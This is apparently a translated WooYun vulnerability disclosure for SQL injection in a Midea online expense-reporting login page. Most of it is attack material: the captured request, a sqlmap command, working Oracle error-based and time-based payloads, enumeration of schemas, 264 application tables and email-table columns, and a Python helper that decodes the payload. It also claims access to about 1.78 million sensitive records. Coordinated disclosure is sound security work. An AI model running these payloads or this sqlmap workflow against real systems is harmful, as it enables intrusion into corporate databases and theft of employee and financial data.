
Vulnerability Summary

Defect ID: wooyun-2015-0160327

Title: Multiple Midea sites: SQL injection / weak passwords (large volume of sensitive data involved)

Vendor: midea.com

Author: 心云

Submitted: 2015-12-11 17:37

Fixed: 2016-01-23 15:16

Published: 2016-01-23 15:16

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-11: Details sent to the vendor, awaiting vendor handling
2015-12-11: Vendor confirmed; details visible to the vendor only
2015-12-21: Details disclosed to core white hats and domain experts
2015-12-31: Details disclosed to regular white hats
2016-01-10: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public

Summary:

Hoping for a front-page spot, thanks to the reviewers ^_^

Details:

0X01 First, the SQL injection
Vulnerable URL:

http://jders.midea.com.cn/Login.aspx


Screenshot: 网上报账系统.png (the online expense-reporting system login page)


A quick test shows the login form does not filter its input: a single quote in the username field triggers a database error.

Screenshot: 网上报账系统单引号报错.png (single-quote error on the expense-reporting login)


Request captured with Burp and saved as post.txt:

POST /Login.aspx?_dc=1449797912532 HTTP/1.1
Accept: */*
X-Ext.Net: delta=true
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://jders.midea.com.cn/Login.aspx
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: jders.midea.com.cn
Content-Length: 3065
Pragma: no-cache
__EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-%7Cpublic%7CbtLoginClick&__VIEWSTATE=[truncated]&__EVENTVALIDATION=%2FwEWAgK0u6rDCwLk1b%2BVAi55K9r446%2BWQ%2F9WWUM6RazKyEiocm%2B1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng%3D%3D&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ%3D%3D&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU%3D&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY%3D&lb8=


sqlmap command:

sqlmap.py -r post.txt --dbs -p tbUid --dbms oracle


Result:

injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
POST parameter 'tbUid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 170 HTTP(s) requests:
---
Parameter: tbUid (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=/wEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDx
YCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAm
YPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTU
ROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVG
d5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFC
sEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFg
IfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFg
IfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2
xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEi
ocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'nhrH'='nhrH&tbPwd=d
d&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=/wEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDx
YCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAm
YPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTU
ROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVG
d5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFC
sEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFg
IfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFg
IfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2
xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEi
ocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 9583=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'IqFl'='IqFl&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0
Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=
---
[09:47:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[09:47:40] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:47:40] [INFO] fetching database (schema) names
[09:47:49] [INFO] the SQL query used returns 8 entries
[09:47:53] [INFO] retrieved: CTXSYS
[09:47:56] [INFO] retrieved: EXFSYS
[09:48:00] [INFO] retrieved: JD_ERS
[09:48:03] [INFO] retrieved: MDSYS
[09:48:07] [INFO] retrieved: OLAPSYS
[09:48:10] [INFO] retrieved: SYS
[09:48:13] [INFO] retrieved: SYSTEM
[09:48:16] [INFO] retrieved: WLEAM
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] JD_ERS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WLEAM
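How sqlmap actually reads data out of this login form is worth spelling out, because the two payloads above look opaque. The error-based one wraps a marker string, a probe query and a second marker inside XMLType(); Oracle rejects the result as an invalid QName and echoes the whole string, markers and leaked value included, in the ORA-31011/LPX-00110 error that the page renders. The time-based one is a five-way self-join of ALL_USERS, whose row count grows as the fifth power of the user count, so the request stalls only when the injected condition is true. The following helper is an added example written for this page, not part of the original report or of sqlmap: it decodes the CHR() concatenation from the payload shown above, recovers the two markers and the inner query, and parses a constructed sample of the Oracle error text (the real response body is not reproduced on the page, so the sample error is an assumption modelled on the standard ORA-31011 message shape).

```python
import re

# Injected value of the tbUid POST parameter, copied from the sqlmap "error-based" entry above.
ERROR_BASED_PAYLOAD = (
    "dd' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)"
    "||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END) FROM DUAL)"
    "||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'nhrH'='nhrH"
)

# Constructed sample of the error Oracle raises when XMLType() is fed an invalid QName.
# The page does not reproduce the real response body; only the shape is assumed here.
SAMPLE_ERROR_RESPONSE = (
    "ORA-31011: XML parsing failed\n"
    "ORA-19202: Error occurred in XML processing\n"
    'LPX-00110: Warning: invalid QName ":qxvqq1qvpzq" (not a Name)\n'
    "Error at line 1"
)

CHR_RUN = re.compile(r"CHR\(\d+\)(?:\|\|CHR\(\d+\))*")
MARKER_RE = re.compile(r"XMLType\('<:(\w+)'\|\|\((.*?)\)\|\|'(\w+)>'\)", re.S)


def collapse_chr(sql: str) -> str:
    """Turn each run of CHR(n)||CHR(m)||... into the string literal it spells out.
    sqlmap builds the markers with CHR() so the payload needs no quote characters."""
    def literal(m: re.Match) -> str:
        codes = re.findall(r"CHR\((\d+)\)", m.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_RUN.sub(literal, sql)


def analyse_payload(sql: str) -> dict:
    """Return the prefix marker, the probe query whose result leaks, and the suffix marker."""
    m = MARKER_RE.search(collapse_chr(sql))
    if not m:
        raise ValueError("not an sqlmap XMLType error-based payload")
    return {"prefix": m.group(1), "query": m.group(2), "suffix": m.group(3)}


def extract_leak(error_text: str, prefix: str, suffix: str):
    """Pull the value the database echoed back between the two markers, or None."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text, re.S)
    return m.group(1) if m else None


def heavy_query_rows(n_users: int, copies: int = 5) -> int:
    """Rows the time-based payload (ALL_USERS T1..T5 cross join) forces Oracle to count:
    n_users ** copies, which is why the true branch of the condition visibly stalls."""
    return n_users ** copies


if __name__ == "__main__":
    info = analyse_payload(ERROR_BASED_PAYLOAD)
    print("markers:", info["prefix"], info["suffix"])
    print("probe query:", info["query"])
    print("leaked value:", extract_leak(SAMPLE_ERROR_RESPONSE, info["prefix"], info["suffix"]))
    print("rows for 40 users:", heavy_query_rows(40))
```

With the page's payload the markers come out as qxvqq and qvpzq, the probe query is the CASE expression (true here, so the leaked value is 1), and the same machinery is what sqlmap uses to page through schema names, table names and columns one fragment at a time. A defender reading web logs can match on XMLType( together with CHR( runs, or on repeated ALL_USERS self-joins, to catch this class of request early.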


Eight schemas are reachable (sqlmap enumerates Oracle schema names in place of database names; SYS, SYSTEM, CTXSYS, EXFSYS, MDSYS and OLAPSYS are Oracle built-ins, and JD_ERS is the application schema enumerated below):

Screenshot: 8个数据库.png (the eight schemas)


All tables in the current schema:

Database: JD_ERS
[264 tables]
+-------------------------------+
| A |
| A1 |
| A2 |
| ACCOUNT_TEST |
| AF_APPLY_DETAIL_BUSI |
| AF_APPLY_DETAIL_CULTIVATE |
| AF_APPLY_DETAIL_EVENCTION |
| AF_APPLY_DETAIL_TEAM |
| AF_APPLY_DETAIL_UNIVERSAL |
| AF_APPLY_MAIN |
| AM_MAIL_TEMPLATE |
| AM_MAIL_TEMPLATE_WF |
| AM_SEND_MAIL_LOG |
| AP_PAYMENT_BILL_BACK |
| AP_PAYMENT_BUDGET_ALL |
| AP_PAYMENT_HEADER |
| AP_PAYMENT_INTERFACE |
| AP_PAYMENT_LINE |
| AP_PAYMENT_SCHEDULE_DETAIL |
| AP_PAYMENT_SCHEDULE_HEADER |
| AP_PAYMENT_SCHEDULE_LINE |
| AP_PAYMENT_SCHEDULE_RELATION |
| AP_PAYMENT_ZK_ALL |
| AUTHORITY_ORG_BUDGET |
| AUTHORITY_ORG_BUDGET_DETAIL |
| AUTHORITY_USER_DETAIL |
| B |
| BAOSI_REQUIRE_LOG |
| BAOSI_REQUIRE_RIGHT |
| BAOSI_SYS_PROJECT |
| BAS_ACCOUNT_TITLE |
| BAS_ACCOUNT_TITLE_DEPT |
| BAS_ACCOUNT_TITLE_OUTLAY |
| BAS_AREA |
| BAS_AREA_CITY |
| BAS_ATTACHMENT |
| BAS_BILL_NUMBER_ITEM |
| BAS_BILL_NUMBER_MAIN |
| BAS_BILL_NUMBER_RIGHT |
| BAS_BUDGET_AUTHORITY_DETAIL |
| BAS_BUDGET_AUTHORITY_MAIN |
| BAS_BUDGET_AUTHORITY_USERS |
| BAS_COSTCENTER |
| BAS_COSTINFORMATION_DATA |
| BAS_COST_ITEM |
| BAS_CURRENCY |
| BAS_EMAIL |
| BAS_ENTERTAIN |
| BAS_ERP_SYNCHRONOUS |
| BAS_EXCHANGE |
| BAS_HOLIDAY |
| BAS_LEVEL_AREA |
| BAS_LEVEL_POST |
| BAS_MIP_NOTIFY_INTERFACE |
| BAS_MODULE_MANAGEMENT |
| BAS_MODULE_WORKFLOW |
| BAS_ORG |
| BAS_ORGANIZATION |
| BAS_ORG_RIGHT |
| BAS_OUTLAY_ITEM_DATA |
| BAS_PAYMENT |
| BAS_PERSONAL |
| BAS_POSTLEVEL_TEMP |
| BAS_POSTLEVLE |
| BAS_PRIVATETOPUBLICCAR_DATA |
| BAS_PUBLICCAR_DATA |
| BAS_SECRETLEVEL_DATA |
| BAS_SECTION_CUSTOMER |
| BAS_SECTION_OFFICE |
| BAS_SUBJECT |
| BAS_SUBJECT_DEPT |
| BAS_SYNC_ERRITEMS |
| BAS_SYNC_LOG |
| BAS_TELEPHONE_DATA |
| BAS_TEMPLATE |
| BAS_TRAVEL_EXPENSE |
| BAS_URGENCYLEVEL_DATA |
| BAS_VENDOR |
| BD_BUDGET |
| BD_BUDGET_0804 |
| BD_BUDGET_20150208 |
| BD_BUDGET_20150302 |
| BD_BUDGET_20150822 |
| BD_BUDGET_20150825 |
| BD_BUDGET_ADD_DETAIL |
| BD_BUDGET_ADD_MAIN |
| BD_BUDGET_ADJUST_DETAIL |
| BD_BUDGET_ADJUST_MAIN |
| BD_BUDGET_APPLY_DETAIL |
| BD_BUDGET_APPLY_ITEM |
| BD_BUDGET_APPLY_MAIN |
| BD_BUDGET_F064 |
| BD_BUDGET_F080 |
| BD_BUDGET_INPUT_DETAIL |
| BD_BUDGET_INPUT_MAIN |
| BD_BUDGET_LOCK_REC |
| BD_BUDGET_ORG |
| BD_BUDGET_ORG_0804 |
| BD_BUDGET_ORG_COL |
| BD_BUDGET_ORG_COL_0804 |
| BD_BUDGET_ORG_DEPART |
| BD_BUDGET_ORG_DEPART_0804 |
| BD_BUDGET_ORG_USER |
| BD_BUDGET_ORG_USER_0804 |
| BD_BUDGET_T |
| BD_BUDGET_TEMP1 |
| BD_BUDGET_TEMP2 |
| BD_BUDGET_TEMP3 |
| BD_BUDGET_TEMPLATE_DETAIL |
| BD_BUDGET_TEMPLATE_MAIN |
| BD_BUDGET_TEMP_ZF |
| BD_BUDGET_TEST |
| BD_ORG |
| BD_TEST |
| BD_ZF_DR |
| BD_ZF_DR_2015 |
| BEE_ELECTRONICINVOICE |
| BEE_ELECTRONICINVOICEREL |
| BEE_ELECTRONICINVOICEREL_TEMP |
| BEE_ELECTRONICINVOICE_TEMP |
| BEE_INTERFACE_LIST |
| BEE_SYNC_LOG |
| BEE_TICKETBILLRELATION |
| BEE_TICKETBILLRELATION_TEMP |
| BEE_TICKETORDER |
| BEE_TICKETORDER_TEMP |
| BEE_TICKETSETTLEMENT |
| BEE_TICKETSETTLEMENTREL |
| BEE_TICKETSETTLEMENTREL_TEMP |
| BEE_TICKETSETTLEMENT_TEMP |
| BILL_RIGHT_DEPT |
| BILL_RIGHT_EMP |
| BILL_RIGHT_MAIN |
| BILL_RIGHT_MENU |
| BILL_TYPECODE_DATA |
| BUDGET_TEST |
| C |
| CASH_RECEIPT_INPUT |
| CASH_RECEIPT_INTERFACE |
| CASH_RECEIPT_LINE |
| CASH_RECEIPT_MAIN |
| CASH_RECEIPT_MARK_DETAIL |
| CASH_RECEIPT_MARK_HEADER |
| CASH_RECEIPT_MARK_LINE |
| CASH_RECEIPT_MARK_RELATION |
| DEPARTMENTNUMBER_TMP |
| DETAIN_AGREEMENT_HEADER |
| ERS_LOGS |
| FD_ADVANCE |
| FD_INVOICE |
| FD_LOAN |
| FD_PAYABLE_DETAIL |
| FD_PAYABLE_MAIN |
| FD_PAYMENT_REC |
| FD_REFUND |
| FD_REFUND_DETAIL |
| FD_VERFICATION |
| FD_VERFICATION_DETAIL |
| IMG_BILLCODE_STATUS_INTERFACE |
| IMG_SYNC_SET |
| LSS_067 |
| MP_MERGE_PAYMENT_DETAIL |
| MP_MERGE_PAYMENT_MAIN |
| MV_ERP_BANK_ACCOUNTS |
| MV_ERP_BUDGET_DETAIL |
| MV_ERP_CURRENCY |
| MV_ERP_DETAIL_SUBJECT |
| MV_ERP_EXCHANGE |
| MV_ERP_GL_CODE_COMBINATIONS |
| MV_ERP_PAYMENT_DOCUMENTS |
| MV_ERP_PAY_REC |
| MV_ERP_PAY_REC_TEST |
| MV_ERP_SUPPLIER |
| MV_ERP_SUPPLIER_SITE |
| MV_ERP_TERMS |
| PARTS |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| RP_DEIFINED_ORG_BUDGET |
| RS_BUSI_DETAIL |
| RS_COST_BEE_DETAIL |
| RS_COST_DETAIL |
| RS_COST_MAIN |
| RS_TRAVELLING_BEE_DETAIL |
| RS_TRAVELLING_DETAIL |
| RS_TRAVELLING_MAIN |
| S010 |
| S011 |
| S011_TEMP |
| S012 |
| S012_TEMP |
| S012_TEMP_ZF |
| S020 |
| S021 |
| S022 |
| S023 |
| S024 |
| S027 |
| S033 |
| S034 |
| S035 |
| S036 |
| S037 |
| S040 |
| S041 |
| S050 |
| S080 |
| S081 |
| S201 |
| S202 |
| S203 |
| S204 |
| S205 |
| S206 |
| S207 |
| S208 |
| S209 |
| S210 |
| S211 |
| S212 |
| S213 |
| S214 |
| S215 |
| S220 |
| S231 |
| S232 |
| S240 |
| S241 |
| S242 |
| S243 |
| S250 |
| S251 |
| S252 |
| S261 |
| S263 |
| S264 |
| S265 |
| S266 |
| S267 |
| S268 |
| SHARE_ACCOUNTS |
| SHARE_DETAIL |
| SHARE_MAIN |
| SMS_SEND |
| SMS_SEND_HISTORY |
| SMS_SYS_CONFIG |
| SUBJECT_TEST |
| SUPPLIER_BANK_ACCOUNTS |
| TEMP_ORACLEPANEL |
| TEMP_SVXBAR |
| TEMP_TABLESPACE |
| TEST1 |
| USER_TEMP |
| ZF_ACCOUNT |
| ZF_COSTCENTER |
| ZF_DEPT |
| ZF_DR_BUDGET |
| ZF_S011 |
| ZF_S207 |
| ZF_S267 |
| ZF_SUBJECT |
+-------------------------------+


A large amount of sensitive data is involved:

Screenshot: user-temp.png (contents of the USER_TEMP table)


Screenshot: 178W.png (178万, i.e. 1.78 million, in Chinese shorthand)


Column details (sqlmap enumerating the BAS_EMAIL table):

[11:16:34] [INFO] fetching columns for table 'BAS_EMAIL' in database 'JD_ERS'
[11:16:34] [INFO] the SQL query used returns 18 entries
[11:16:34] [INFO] resumed: CREATENAME
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: CREATETIME
[11:16:34] [INFO] resumed: DATE
[11:16:34] [INFO] resumed: UPDATEID
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: UPDATENAME
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: UPDATETIME
[11:16:34] [INFO] resumed: DATE
[11:16:34] [INFO] resumed: FD_ID
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: SEQUENCE_ID
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: EMAIL_SUBJECT
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_RECEIVER
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: OTHER_EMAIL
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_CONTENT
[11:16:34] [INFO] resumed: CLOB
[11:16:34] [INFO] resumed: EMAIL_FORMAT
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_SENDER
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: IS_BCC
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: PT_ID
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: UPLOAD_MIP_FLAG
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: SEND_FLAG
